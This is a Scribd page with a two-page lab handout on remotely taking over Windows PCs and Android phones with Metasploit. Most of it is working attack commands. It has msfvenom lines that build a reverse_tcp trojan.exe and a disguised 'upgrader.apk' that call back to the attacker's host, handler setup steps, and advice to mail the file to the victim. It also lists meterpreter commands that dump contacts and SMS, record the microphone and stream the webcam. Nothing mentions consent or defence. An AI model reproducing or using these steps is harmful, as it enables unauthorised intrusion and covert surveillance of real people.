Scribd Logo
Upload

Welcome to Scribd!

  • Remote Hacking Lab 07 PDF

    Uploaded by

    Zain Shabbir
    227 views2 pages
    This document provides instructions for remotely hacking Windows systems and Android phones using Metasploit. It describes how to generate a reverse_tcp Trojan payload to execute on a Windows system for remote access via Metasploit. It also explains how to generate an Android payload apk file to install on a phone for remote access and control, including commands to gather information and control the device.

    Original Description:

    Original Title

    Remote Hacking lab 07.pdf

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document provides instructions for remotely hacking Windows systems and Android phones using Metasploit. It describes how to generate a reverse_tcp Trojan payload to execute on a Windows system for remote access via Metasploit. It also explains how to generate an Android payload apk file to install on a phone for remote access and control, including commands to gather information and control the device.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    227 views2 pages

    Remote Hacking Lab 07 PDF

    Uploaded by

    Zain Shabbir
    This document provides instructions for remotely hacking Windows systems and Android phones using Metasploit. It describes how to generate a reverse_tcp Trojan payload to execute on a Windows system for remote access via Metasploit. It also explains how to generate an Android payload apk file to install on a phone for remote access and control, including commands to gather information and control the device.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 2

    LAB 07 - REMOTE HACKING VIA METASPOLIT

    Learning Objectives

    In today’s lab, you will learn/practice;

    1. Remote hacking.
    2. How to remotely hack windows system via msf console.
    3. How to remotely hack android phone via msf console.

    Practice Exercise

    Windows Hacking:

    1. Windows are vulnerable to Trojan attacks regardless of version. Open terminal in


    kali linux and type

    msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f


    exe LHOST=”attacker ip” LPORT=444 -o /root/Desktop/trojan.exe

    A trojan will be generated in the desktop. A Trojan or backdoor can give access to
    target machine remotely. We are using reverse_tcp Trojan. Reverse_tcp Trojan is
    a specially crafted malware that establishes a remote connection to the hacker
    machine over the TCP from the victim machine. This allows the hacker to breach
    into the machine and take full control over it. Transfer the above created file to
    victim’s PC and move on to handler section.
    2. Start the metasploit framework console as follows:
    root@kali:-# msfconsole
    3. Now it's time to open and setup multi-handler. Follows the steps:
    msf>use multi/handler
    msf exploit(handler)>set payload windows/meterpreter/reverse_tcp
    msf exploit(handler)>set LHOST “attacker ip”
    msf exploit(handler)>set LPORT 444
    msf exploit(handler)>exploit
    Payload Handler is being started........
    4. When the victim clicks on the .exe file in his system, meterpreter session will be
    established.
    5. Type meterpreter>help to find a list of commands and use them to exploit the
    compromised PC
    Android Hacking:

    1. Open terminal in kali linux and type


    #msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.0.110
    LPORT=4444 R > /root/Desktop/upgrader.apk
    (To know your LHOST, open a new terminal and type ifconfig).
    2. Transfer/mail this file (here upgrader.apk) file to the victim's phone and install it.
    3. Start the metasploit framework console as follows :
    root@kali:-# msfconsole
    4. Now it's time to open and setup multi-handler. Follows the steps:
    msf>use multi/handler
    msf exploit(handler)>set payload android/meterpreter/reverse_tcp
    msf exploit(handler)>set LHOST “attacker ip”
    msf exploit(handler)>set LPORT 4444
    msf exploit(handler)>exploit

    Payload Handler is being started........


    5. When the victim clicks on the app (installed as MAIN ACTIVITY in the menu) in his
    phone, meterpreter session will be established.
    6. To start exploiting the compromised phone, type
    sysinfo to get information of the device
    ps to displays ongoing processes
    dump_contacts fetches all contacts
    dump_sms fetches all received/sent messages
    record_mic 5 records for x seconds
    webcam_list displays the camera’s available
    webcam_snap displays the snapshot of the current activity
    webcam_stream starts live video streaming from compromised device.

    You might also like